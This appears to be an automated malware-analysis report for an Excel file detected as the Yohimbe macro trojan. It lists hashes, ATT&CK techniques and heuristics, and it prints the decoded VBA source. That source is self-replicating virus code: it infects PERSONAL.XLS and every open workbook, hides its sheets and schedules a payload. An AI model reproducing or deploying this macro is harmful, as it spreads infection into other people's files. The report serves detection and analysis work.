Yohimbe — Office (OLE) malware analysis

Static analysis result for SHA-256 e694bc3650ded6f4…

MALICIOUS

Office (OLE)

25.0 KB Created: 2000-01-11 16:58:56 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: d3931d4408601b83424039aff923895e SHA-1: 9e71126c8e711019ff5b4f8acdb2ee6fad6aa7a3 SHA-256: e694bc3650ded6f4e4b8e418fdd68b894f388d73ea78c5d086ef125ddfd0e35f
180 Risk Score

Malware Insights

Yohimbe · confidence 90%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The file is an Excel document containing a VBA macro with an Auto_Open subroutine, identified by ClamAV as the Yohimbe trojan. The macro attempts to infect the Personal.xls file, a common technique for establishing persistence. The explicit mention of 'Yohimbe' in the script and ClamAV detection strongly suggests this family.

Heuristics 3

  • ClamAV: Xls.Trojan.Yohimbe-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Yohimbe-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5045 bytes
SHA-256: 86ac77d7768e11a9a6c4eaa882ca63c5e0e6baf36fee2d9b9b85a4a37b3405b8
Detection
ClamAV: Xls.Trojan.Yohimbe-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Modul 1"
                                The YohimBe Virus
                                ~~~ ~~~~~~~ ~~~~~

Here 's the Excel Macro Virus Yohimbe for you...  I have disassembled it so you can see
what is going on!

MACRO Auto_Open

Sub Auto_Open()
    On Error GoTo FixIt 'Errorhandler
    'Set up infected book as a variable
    Dim SaveBook As String
    SaveBook = ActiveWorkbook.Name
    Application.ScreenUpdating = False 'Don't want to see it working
    ' Check Personal.xls for prior infection
    Windows("PERSONAL.XLS").Visible = True
        If SheetExists("Exec") Then
        Windows("PERSONAL.XLS").Visible = False
        GoTo AlreadyInfected
        Else
    ' Infect Personal.xls
    Workbooks(SaveBook).Activate
    Sheets("Exec").Visible = True
    Sheets("Exec").Select
    Sheets("Exec").Copy Before:=Workbooks("PERSONAL.XLS").Sheets(1)
    Workbooks("PERSONAL.XLS").Activate
    ActiveWorkbook.Sheets("Exec").Visible = False
    ActiveWindow.Visible = False
    Workbooks("PERSONAL.XLS").Save
AlreadyInfected:  ' Return to originally opened book
    Workbooks(SaveBook).Activate
    ActiveWorkbook.Sheets("Exec").Visible = False
    End If
    GoTo OhKay
FixIt:  ' In case of error infect everything that's open
    DipDing
    End
OhKay:  ' Set time to infect all open books
    Application.OnTime EarliestTime:=TimeValue("4:00 PM"), _
    Procedure:="DipDing"
End Sub
 
MACRO DipDing

Sub DipDing() ' Routine to infect all open books
    On Error GoTo DipFix ' Set up error handler
    Application.ScreenUpdating = False
    Dim book As Object
    Dim CurrBook As String
    CurrBook = ActiveWorkbook.Name
        'Check each open book for infection, infect if not already infected
        For Each book In Workbooks
        book.Activate
            If SheetExists("Exec") Then
            GoTo Done
            Else
    Windows("PERSONAL.XLS").Visible = True
    Windows("PERSONAL.XLS").Activate
    Sheets("Exec").Visible = True
    Sheets("Exec").Copy Before:=book.Sheets(1)
    Sheets("Exec").Visible = False
    ActiveSheet.PageSetup.RightHeader = "Yohimbe"
    book.Save
Done:
    End If
    Next book
    'Cover your tracks
    Windows("PERSONAL.XLS").Activate
    Sheets("Exec").Visible = False
    Windows("PERSONAL.XLS").Visible = False
    Workbooks(CurrBook).Activate
    Application.OnTime EarliestTime:=TimeValue("4:45 PM"), _
    Procedure:="PayLoad"
DipFix:
End Sub

Function SheetExists(sName As String) As Boolean 'Infection checker function
    Dim aSheet As Object
    SheetExists = False
    For Each aSheet In ActiveWorkbook.Sheets
        If (StrComp(aSheet.Name, sName, 1) = 0) Then
        SheetExists = True
        End If
    Next aSheet
End Function

MACRO PayLoad

Sub PayLoad()
    Cells.Select
    Range("B1").Activate
    Selection.RowHeight = 15
    Selection.ColumnWidth = 2.5
    Range("B9,C10,D11,D12,E13,F14,F15,G15,H15,I15,J15,K15,L15,M15,M14,N13,N12,N11,N10,N9,N8,
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.